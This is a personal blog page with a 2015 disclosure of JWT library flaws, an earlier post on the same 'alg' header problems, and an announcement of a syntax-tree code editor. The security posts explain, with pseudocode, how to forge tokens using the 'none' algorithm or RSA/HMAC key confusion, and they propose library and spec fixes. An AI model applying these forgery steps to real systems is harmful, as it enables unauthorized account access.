Tim's blog

programming, crypto, etc in Waterloo, Ontario, Canada.

Critical vulnerabilities in JSON Web Token libraries

March 31, 2015

This article originally appeared as a guest post on Auth0’s blog. Many thanks to them for publishing it and for helping me track down library maintainers.

Recently, while reviewing the security of various JSON Web Token implementations, I found many libraries with critical vulnerabilities allowing attackers to bypass the verification step. The same two flaws were found across many implementations and languages, so I thought it would be helpful to write up exactly where the problems occur. I believe that a change to the standard could help prevent future vulnerabilities.

For those who are unfamiliar, JSON Web Token (JWT) is a standard for creating tokens that assert some number of claims. For example, a server could generate a token that has the claim “logged in as admin” and provide that to a client. The client could then use that token to prove that they are logged in as admin. The tokens are signed by the server’s key, so the server is able to verify that the token is legitimate.

JWTs generally have three parts: a header, a payload, and a signature. The header identifies which algorithm is used to generate the signature, and looks something like this:

header = '{"alg":"HS256","typ":"JWT"}'

HS256 indicates that this token is signed using HMAC-SHA256.

The payload contains the claims that we wish to make:

payload = '{"loggedInAs":"admin","iat":1422779638}'

As suggested in the JWT spec, we include a timestamp called iat, short for “issued at”.

The signature is calculated by base64url encoding the header and payload and concatenating them with a period as a separator:

key = 'secretkey'
unsignedToken = encodeBase64(header) + '.' + encodeBase64(payload)
signature = HMAC-SHA256(key, unsignedToken)

To put it all together, we base64url encode the signature, and join together the three parts using periods:

token = encodeBase64(header) + '.' + encodeBase64(payload) + '.' + encodeBase64(signature)

# token is now:
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJsb2dnZWRJbkFzIjoiYWRtaW4iLCJpYXQiOjE0MjI3Nzk2Mzh9.gzSraSYS8EXBxLN_oWnFSRgCzcmJmMjLiuyu5CSpyHI

Great. So, what’s wrong with that?

Well, let’s try to verify a token.

First, we need to determine what algorithm was used to generate the signature. No problem, there’s an alg field in the header that tells us just that.

But wait, we haven’t validated this token yet, which means that we haven’t validated the header. This puts us in an awkward position: in order to validate the token, we have to allow attackers to select which method we use to verify the signature.

This has disastrous implications for some implementations.

Meet the “none” algorithm

The none algorithm is a curious addition to JWT. It is intended to be used for situations where the integrity of the token has already been verified. Interestingly enough, it is one of only two algorithms that are mandatory to implement (the other being HS256).

Unfortunately, some libraries treated tokens signed with the none algorithm as a valid token with a verified signature. The result? Anyone can create their own “signed” tokens with whatever payload they want, allowing arbitrary account access on some systems.

Putting together such a token is easy. Modify the above example header to contain "alg": "none" instead of HS256. Make any desired changes to the payload. Use an empty signature (i.e. signature = "").

Most (hopefully all?) implementations now have a basic check to prevent this attack: if a secret key was provided, then token verification will fail for tokens using the none algorithm. This is a good idea, but it doesn’t solve the underlying problem: attackers control the choice of algorithm. Let’s keep digging.

RSA or HMAC?

The JWT spec also defines a number of asymmetric signing algorithms (based on RSA and ECDSA). With these algorithms, tokens are created and signed using a private key, but verified using a corresponding public key. This is pretty neat: if you publish the public key but keep the private key to yourself, only you can sign tokens, but anyone can check if a given token is correctly signed.

Most of the JWT libraries that I’ve looked at have an API like this:

# sometimes called "decode"
verify(string token, string verificationKey)
# returns payload if valid token, else throws an error

In systems using HMAC signatures, verificationKey will be the server’s secret signing key (since HMAC uses the same key for signing and verifying):

verify(clientToken, serverHMACSecretKey)

In systems using an asymmetric algorithm, verificationKey will be the public key against which the token should be verified:

verify(clientToken, serverRSAPublicKey)

Unfortunately, an attacker can abuse this. If a server is expecting a token signed with RSA, but actually receives a token signed with HMAC, it will think the public key is actually an HMAC secret key.

How is this a disaster? HMAC secret keys are supposed to be kept private, while public keys are, well, public. This means that your typical ski mask-wearing attacker has access to the public key, and can use this to forge a token that the server will accept.

Doing so is pretty straightforward. First, grab your favourite JWT library, and choose a payload for your token. Then, get the public key used on the server as a verification key (most likely in the text-based PEM format). Finally, sign your token using the PEM-formatted public key as an HMAC key. Essentially:

forgedToken = sign(tokenPayload, 'HS256', serverRSAPublicKey)

The trickiest part is making sure that serverRSAPublicKey is identical to the verification key used on the server. The strings must match exactly for the attack to work – exact same format, and no extra or missing line breaks.

End result? Anyone with knowledge of the public key can forge tokens that will pass verification.

How can libraries fix this?

I suggest that JWT libraries add an algorithm parameter to their verification function:

verify(string token, string algorithm, string verificationKey)

The server should already know what algorithm it uses to sign tokens, and it’s not safe to allow attackers to provide this value.

Some might argue that some servers need to support more than one algorithm for compatibility reasons. In this case, a separate key can (and should) be used for each supported algorithm. JWT conveniently provides a “key ID” field (kid) for exactly this purpose. Since servers can use the key ID to look up the key and its corresponding algorithm, attackers are no longer able to control the manner in which a key is used for verification. In any case, I don’t think JWT libraries should even look at the alg field in the header, except maybe to check that it matches what was the expected algorithm.

Anyone using a JWT implementation should make sure that tokens with a different signature type are guaranteed to be rejected. Some libraries have an optional mechanism for whitelisting or blacklisting algorithms; take advantage of it or you might end up at risk. Even better: have a policy of performing security audits on any open source libraries that you use to provide mission-critical funtionality.

Improving the JWT/JWS standard

I would like to propose deprecating the header’s alg field. As we’ve seen here, its misuse can have a devastating impact on the security of a JWT/JWS implementation. As far as I can tell, key IDs provide an adequate alternative. This warrants a change to the spec: JWT libraries continue to be written with security flaws due to their dependence on alg.

JWT (and JOSE) present the opportunity to have a cross-platform suite of secure cryptography implementations. With these fixes, hopefully we’re a little bit closer to making that a reality.

Creative Commons License
The above work is licensed under a Creative Commons Attribution 4.0 International License.

What I don't like about JSON Web Tokens

February 25, 2015

Note: this post is here for historical reasons. I wrote an updated and expanded version here that you should read instead.

JSON Web Token (JWT) is a standard for creating tokens that assert some number of claims. For example, a server could generate a token that has the claim “logged in as admin” and provide that to a client. The client could then use that token to prove that they are logged in as admin. The tokens are signed by the server’s key, so the server is able to verify that the token is legitimate.

JWTs generally have three parts: a header, a payload, and a signature. The header identifies which algorithm is used to generate the signature, and looks something like this:

header = '{"alg":"HS256","typ":"JWT"}'

HS256 indicates that this token is signed using HMAC-SHA256.

The payload contains the claims that we wish to make:

payload = '{"loggedInAs":"admin","iat":1422779638}'

As suggested in the JWT spec, we include a timestamp called iat, short for “issued at”.

The signature is calculated by base64url encoding the header and payload and concatenating them with a period as a separator:

key = 'secretkey'
unsignedToken = encodeBase64(header) + '.' + encodeBase64(payload)
signature = HMAC-SHA256(key, unsignedToken)

To put it all together, we base64url encode the signature, and join together the three parts using periods:

token = encodeBase64(header) + '.' + encodeBase64(payload) + '.' + encodeBase64(signature)

# token is now:
eyJhbGciOiJIUzI1NiIsInR5cCI6IkpXVCJ9.eyJsb2dnZWRJbkFzIjoiYWRtaW4iLCJpYXQiOjE0MjI3Nzk2Mzh9.gzSraSYS8EXBxLN_oWnFSRgCzcmJmMjLiuyu5CSpyHI

Great. So, what’s wrong with that?

Well, let’s try to verify a token.

First, we need to determine what algorithm was used to generate the signature. No problem, there’s an alg field in the header that tells us just that.

But wait, we haven’t validated this token yet, which means that we haven’t validated the header. This puts us in an awkward position: in order to validate the token, we have to allow attackers to select which method we use to verify the signature.

Spec, meet implementation, meet disaster

So, what are the implications? Well, first of all, an attacker could turn your HMAC-SHA512 verification into a HMAC-SHA256 verification. Of course, that’s pretty boring, since HMAC-SHA256 is still plenty secure. Maybe in some cases, you could confuse an implementation into using an HMAC key as an RSA key…?

But let’s take another look at the spec. Oh, look, a signing algorithm called none! And it’s mandatory to implement! A bit of research shows that some JWT libraries will happily accept a token signed with the none algorithm and otherwise ignore the server’s secret key. End result: anyone can create their own “signed” tokens and claim to be logged in as “admin”.

What can we do about it?

Most of the JWT libraries that I’ve looked at have an API like this:

# sometimes called "decode"
verify(string token, string secretKey)
# returns payload if valid token, else that's an error

I suggest adding an algorithm parameter. The server should already know what algorithm it uses to sign tokens. Many libraries use HMAC-SHA256 as a default, which seems reasonable. In any case, JWT libraries should probably not even look at the alg field in the header, except maybe to check that it says what they expect it to say.

Anyone using a JWT implementation should read the code to make sure that any tokens signed with none are flat-out rejected. To be extra safe, make sure that any tokens you receive are signed using the algorithm you expect. Even better: have a policy of performing security audits on any open source libraries that you use to provide mission-critical funtionality.

Where did things go wrong?

I’m honestly unsure why the standard specifies an alg field at all. I suspect the original intention may have been to allow the token to specify which key it was signed with, in case a server wanted to support both HMAC and RSA (for example). Alternatively, this may have been intended to provide cryptographic agility. It seems to me, though, that the “key ID” header field is quite adequate for both of these purposes, and less prone to errors in implementation.

The inclusion of a none algorithm is rather baffling. Presumably, it covers some use case, but I would have left it out – simpler protocols are easier to get right.

Introducing Substructed: a new way of editing code

October 03, 2013

I’d like to introduce you to a side project of mine. Substructed (demo) is a programming editor that takes advantage of the structured nature of code to allow advanced programmers to write and edit code more quickly.

Most editors today (such as Vim and Emacs) provide two dimensions for navigating code: down/up (rows) and left/right (columns). Substructed also provides two dimensions for navigation: forward/backward and in/out. Instead of navigating text, you navigate the syntax tree.

Consider, for example, the following JSON:

[
    "a",
    "b",
    "c",
    [
        "d",
        "e",
        "f"
    ],
    "g"
]

Substructed’s cursor looks essentially like a selection:

[
	"a",
	"b",
	"c",
	[
		"d",
		"e",
		"f"
	],
	"g"
]

If we navigate forward one movement (which corresponds to the “j” key in Substructed’s command mode), the cursor moves to the next element of the array:

[
    "a",
    "b",
    "c",
    [
        "d",
        "e",
        "f"
    ],
    "g"
]

If we navigate inward one movement (which corresponds to the enter key in Substructed’s command mode), the cursor moves inside the inner array to the first element:

[
    "a",
    "b",
    "c",
    [
        "d",
        "e",
        "f"
    ],
    "g"
]

Today, I’m open sourcing a prototype of Substructed (demo) that can edit JSON. Very soon, I would like to begin implementing support for “real” language (I’m currently considering Python). I’m making this prototype available now to collect feedback before moving forward.